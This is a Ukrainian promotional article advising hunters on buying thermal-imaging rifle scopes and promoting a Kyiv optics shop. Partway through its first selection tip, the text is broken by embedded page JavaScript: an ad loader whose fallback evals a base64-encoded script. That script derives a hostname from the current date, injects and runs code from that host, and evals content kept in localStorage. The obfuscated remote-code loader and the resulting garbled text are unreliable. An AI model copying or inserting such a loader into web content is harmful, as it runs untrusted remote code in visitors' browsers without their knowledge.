Зовсім недавно тепловізійні технології були прерогативою виключно військових, і на цивільному ринку були абсолютно недоступні. Час не стоять на місці, подешевшали багато комплектуючих, стали менш затратні складні виробничі процеси. Виробники побачили новий сегмент ринку та його далекосяжні перспективи. Ціни на тепловізійні приціли почали швидко знижуватися, і все більша кількість брендів включило їх у свій асортимент. Конкурентна гонка за споживача зробила свою справу, і все більша кількість мисливцем можуть дозволити собі купити приціл з тепловізором.
На сьогоднішній день є сотні пропозицій на будь-які стрілецькі завдання, починаючи від розважальних стрільб і закінчуючи снайперськими дисциплінами на позамежних дистанціях. Сучасний приціл давно перетворився на справжній мультимедійний пристрій, дозволяючи орієнтуватися на місцевості, записувати на відео все, що потрапляє в поле зору, вимірювати дальність до цілі, і вносити корективи в положення прицільної сітки. GPS модулі допоможуть запам’ятати локацію і побудувати маршрут пересування. Швидкісний Wi-Fi дає можливість в прямому ефірі транслювати полювання в мережу і так далі. Вибір просто величезний, основним недоліком, як і раніше, залишається досить висока вартість.
Де купити тепловізійний приціл в Україні
Одним з ключових гравців ринку прицілів с тепловізором в нашій країні є компанія Optic Store (Київ, Україна). В каталозі https://opticstore.com.ua/ua/catalog/teplovizionnye-pricely можна бачити моделі всіх провідних світових виробників. Асортимент постійно оновлюється, керівництво підтримує прямі контакти з виробниками і радує лояльною ціновою політикою і міжнародною гарантією на все обладнання. Персонал чудово орієнтується в темі, надає допомогу в підборі моделі на конкретне озброєння.
У чому основні відмінності, на що звернути увагу при виборі.
1. Одним з головних показників будь-якого тепловізійного прицілу є такий важливий параметр як дальність розпізнавання. Виробники частіше вказують на відстань виявлення. Це два принципово різні поняття, на які слід звертати увагу. Побачити теплий об’єкт можна зі значно більшої відстані, а ось переконатися в тому, що перед вами трофейну тварина вийде з набагато меншою дистанції. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
2. Оптика. Як і у випадку з денними прицілами, від об’єктива тепловізійного залежить робоча відстань і якість картинки. Чим більше діаметр об’єктиву, тим далі ви зможете чітко бачити ціль. У будь-якої моделі є цифровий зум, який наближає зображення. Вибирайте оптику з великими можливостями для більш точної стрільби на середніх і дальніх дистанціях.
3. Роздільна здатність ІК сенсора. Тепловізійні матриці з великою роздільною здатністю (640х512рх) надають найбільш якісну картинку, розширюючи на максимум можливості мисливця.
4. Вбудовані опції запису. Хочете дивувати колег і друзів по полюванню. Купуйте приціл з можливістю запису відео.
5. Лазерний далекомір, компас, GPS модуль і пр. Наявність далекоміра значно полегшить стрілянину на дальніх дистанціях, у стрілка відпадає необхідність використання додаткового обладнання.
Підводячи підсумки, можемо зазначити, що в реаліях 2022 року можна вибрати і купити тепловізійний приціл для вирішення будь-яких завдань, як на полюванні, так і в тактичному застосуванні. (adsbygoogle = window.adsbygoogle || []).push({});
Источник: https://akzent.zp.ua/teplovizijni-pritsili-gigantskij-krok-u-polyuvanni/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook